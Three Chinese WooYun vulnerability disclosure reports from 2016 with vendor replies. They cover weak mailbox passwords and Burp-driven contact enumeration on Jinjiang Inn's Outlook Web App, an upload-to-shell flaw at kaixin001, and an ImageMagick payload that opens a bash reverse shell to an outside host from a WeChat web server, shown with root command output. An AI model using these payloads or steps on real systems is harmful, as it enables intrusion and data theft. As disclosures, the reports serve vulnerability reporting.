漏洞详情披露状态： 2016-04-23： 细节已通知厂商并且等待厂商处理中2016-04-25： 厂商已经确认，细节仅向厂商公开2016-05-05： 细节向核心白帽子及相关领域专家公开2016-05-15： 细节向普通白帽子公开2016-05-25： 细节向实习白帽子公开2016-06-09： 细节向公众公开简要描述：总会有一两个弱口令的，有一两个又会引出后续更多的问题，[email protected]/* */大牛的教育详细说明：https://mail.jj-inn.com/owa/锦江之星的邮件系统，看了一下以前的漏洞，似乎很少有关于锦江之星邮箱弱口令的,基本上都是SQL注入类的，今天找到一枚弱口令邮箱code 区域[email protected]/* */看到跳转了，跳到了重置密码的页面，后来在邮箱里面发现有一个90天的周期，周期结束，强制更改密码，我估计这个账号已经很久没有人登陆了重置密码为：adm!n123，OK了邮箱有很多关于账号密码的邮件，且大部分都是弱口令后面发现很多账号使用的是1qaz2wsx,111111,a12345等弱口令(当然不是邮箱账号，而是分配给代理商的账号和密码)code 区域https://220.196.57.152:442/por/service.csp vpn地址使用账号密码登陆，没有vpn权限，看来还得找运维的人才是靠谱。 漏洞证明：下面开始重点，就是outlook web app的联系人导出问题这个问题，[email protected]/* */大牛，他告诉我，看一下这篇code 区域 WooYun: 视频网站安全之优酷土豆账户体系控制不严引发内网漫游（涉及后台\云平台主站\内部商城全部源码\100台服务器权限和数据库信息等） 每个联系人都有一个特别的ID，如下面按分组，找到全部员工然后保存网页到本地code 区域https://mail.jj-inn.com/owa/?ae=Item&a=Open&t=ADDistList&id=K15rPYxhC0OQKMpSvP7uPw%3d%3d&pspid=_1461300333450_341817680自己写一个脚本程序，使用正则表达式将id提取出来，共计3000多个id由于变成不是很好，试着使用脚本访问https，一直出错，verify设置为False也不行，求教育。这条路子封了，我们还有别的路，对了burp suite，设置变量，将提出的id导入burp中，开跑了code 区域页面get包 GET /owa/?ae=Item&a=Open&t=AD.RecipientType.User&id=§xvJJGKCHR0ayfdGVbJhkvw%3d%3d§&pspid=_1461299763468_260363118 HTTP/1.1 Host: mail.jj-inn.com Connection: keep-alive Cache-Control: max-age=0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.154 Safari/537.36 LBBROWSER Accept-Encoding: gzip, deflate, sdch Accept-Language: zh-CN,zh;q=0.8 Cookie: MstrPgLd1=1; MstrPgLd2=1; OutlookSession=15b24012de8a4933869***909a092192; PBack=0; cadata="0mAqYK1o8RGO0J5O4f****8xJ2CoQkT+7xsdJ2XlPt3*****5zfJzlaAzk3IYW8KZCamJPaLIj0Q0wwW+***FDQ=="; sessionid=8c87b22b-1****6-4a23-9073-1ee0d78f6b3f; UserContext=I8fkTxI27kWUL-lZbr2cp8z4piBDcNMIBjGhfTfhzZ7S73u99o-2vRYCXR8wJ6ELYTv***Gq1bk.; tzid=China Standard Time; owacsdc=1使用burp中的正则表达式提取邮箱很顺利拿到了全部邮箱 修复方案：增强员工安全意识版权声明：转载请注明来源 路人甲@乌云漏洞回应厂商回应：危害等级：中漏洞Rank：10确认时间：2016-04-25 10:10厂商回复：已确认，感谢提醒最新状态：暂无

漏洞详情披露状态： 2016-05-06： 细节已通知厂商并且等待厂商处理中2016-05-06： 厂商已经确认，细节仅向厂商公开2016-05-16： 细节向核心白帽子及相关领域专家公开2016-05-26： 细节向普通白帽子公开2016-06-05： 细节向实习白帽子公开2016-06-20： 细节向公众公开简要描述：RT详细说明：http://zhaopin.kaixin001.com/yingcai/personal.php?jid=113&come_from=3&isupdate=发布简历处，上传照片为exp，可反弹shell主站、games源码也泄露了 漏洞证明：http://zhaopin.kaixin001.com/yingcai/personal.php?jid=113&come_from=3&isupdate=发布简历处，上传照片为exp，可反弹shell主站、games源码也泄露了 修复方案： 版权声明：转载请注明来源 HackBraid@乌云漏洞回应厂商回应：危害等级：中漏洞Rank：5确认时间：2016-05-06 11:14厂商回复：已经收到 谢谢！最新状态：暂无

漏洞详情披露状态： 2016-05-05： 细节已通知厂商并且等待厂商处理中2016-05-10： 厂商已经确认，细节仅向厂商公开2016-05-20： 细节向核心白帽子及相关领域专家公开2016-05-30： 细节向普通白帽子公开2016-06-09： 细节向实习白帽子公开2016-06-24： 细节向公众公开简要描述：微信网页版服务器存在远程命令执行漏洞，root权限，呵呵详细说明：#1 存在漏洞服务器地址https://wx2.qq.com/#2 与自己聊天发送一个图片#3 payloadcode 区域push graphic-context viewbox 0 0 640 480 fill 'url(https://"|/bin/bash -i >& /dev/tcp/*.*.*.*/8080 0>&1")' pop graphic-context 漏洞证明：#4 获得一个远程SHELLcode 区域[email protected]/* */*.*:~# /sbin/ifconfig -aeth0 Link encap:Ethernet HWaddr *.**.**.*inet addr:223.167.*.* Bcast:223.167.*.* Mask:255.255.255.128UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1RX packets:207675290974 errors:0 dropped:0 overruns:0 frame:0TX packets:381824340869 errors:0 dropped:0 overruns:0 carrier:0collisions:0 txqueuelen:1000 RX bytes:64553957542020 (61563451.3 Mb) TX bytes:484719339307282 (462264384.5 Mb)eth1 Link encap:Ethernet HWaddr *.**.**.**.*inet addr:10.54.*.* Bcast:10.54.*.* Mask:255.255.255.192UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1RX packets:79387181028 errors:0 dropped:0 overruns:0 frame:0TX packets:233634377039 errors:0 dropped:0 overruns:0 carrier:0collisions:0 txqueuelen:1000 RX bytes:604955868080734 (576930873.9 Mb) TX bytes:262973934281267 (250791487.0 Mb)ip6tnl0 Link encap:UNSPEC HWaddr 00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00 NOARP MTU:1460 Metric:1RX packets:0 errors:0 dropped:0 overruns:0 frame:0TX packets:0 errors:0 dropped:0 overruns:0 carrier:0collisions:0 txqueuelen:0 RX bytes:0 (0.0 b) TX bytes:0 (0.0 b)lo Link encap:Local Loopback inet addr:127.0.0.1 Mask:255.0.0.0inet6 addr: ::1/128 Scope:HostUP LOOPBACK RUNNING MTU:16436 Metric:1RX packets:532406147 errors:0 dropped:0 overruns:0 frame:0TX packets:532406147 errors:0 dropped:0 overruns:0 carrier:0collisions:0 txqueuelen:0 RX bytes:14164026742798 (13507868.5 Mb) TX bytes:14164026742798 (13507868.5 Mb)sit0 Link encap:IPv6-in-IPv4 NOARP MTU:1480 Metric:1RX packets:0 errors:0 dropped:0 overruns:0 frame:0TX packets:0 errors:0 dropped:0 overruns:0 carrier:0collisions:0 txqueuelen:0 RX bytes:0 (0.0 b) TX bytes:0 (0.0 b)tunl0 Link encap:IPIP Tunnel HWaddr NOARP MTU:1480 Metric:1RX packets:0 errors:0 dropped:0 overruns:0 frame:0TX packets:0 errors:0 dropped:0 overruns:0 carrier:0collisions:0 txqueuelen:0 RX bytes:0 (0.0 b) TX bytes:0 (0.0 b)[email protected]/* */*.*:~# cat /etc/hosts## hosts This file describes a number of hostname-to-address# mappings for the TCP/IP subsystem. It is mostly# used at boot time, when no name servers are running.# On small systems, this file can be used instead of a# "named" name server.# Syntax:# # IP-Address Full-Qualified-Hostname Short-Hostname#127.0.0.1 Tencent64.site Tencent64 localhost# special IPv6 addressescode 区域root 4307 1 0 Apr08 ? 00:00:27 /usr/local/agenttools/agent/agent -c /usr/local/agenttools/agent/client.conf root 4323 1 0 Apr08 ? 00:00:03 /usr/local/agenttools/agent/agentPlugInD root 4341 1 0 Apr08 ? 01:37:02 /usr/local/agenttools/agent/base -d5 -c1 -m4 -s /usr/local/agenttools/agent/base.conf root 4350 1 0 Apr08 ? 00:00:49 /usr/local/agenttools/agent/tcvmstat root 4449 1 0 Apr08 ? 00:01:49 /usr/local/agenttools/agent/sysddd root 6234 2 0 Jan18 ? 00:19:57 [flush-8:0] root 6664 1 0 Jan20 ? 00:00:07 nws-watchdog root 6665 6664 0 Jan20 ? 07:37:33 nws:http.so,worker_0-2 root 6692 2 0 Jan18 ? 00:04:48 [kjournald] root 6693 2 0 Jan18 ? 00:05:46 [kjournald] 100 7321 1 0 Jan18 ? 00:00:05 /usr/bin/dbus-daemon --system root 7341 1 0 Jan18 ? 00:00:01 /usr/sbin/hald --daemon=yes --retain-privileges root 7682 1 0 15:37 ? 00:00:00 /bin/sh /usr/local/sa/agent/watchdog.sh root 8028 1 0 15:37 ? 00:00:18 /usr/local/sa/agent/secu-tcs-agent root 8036 1 0 Jan18 ? 00:00:00 /usr/local/sbin/sshd -f /etc/ssh2/sshd2_config.l root 8045 1 0 Jan18 ? 00:00:00 /usr/local/sbin/sshd 修复方案：# 补丁版权声明：转载请注明来源 猪猪侠@乌云漏洞回应厂商回应：危害等级：高漏洞Rank：10确认时间：2016-05-10 10:29厂商回复：非常感谢您的报告，IM组件的问题，已经有白帽子在tsrc平台报告过，此问题我们已经第一时间紧急处理。感谢大家对腾讯业务安全的关注。如果您有任何疑问，欢迎反馈，最新状态：暂无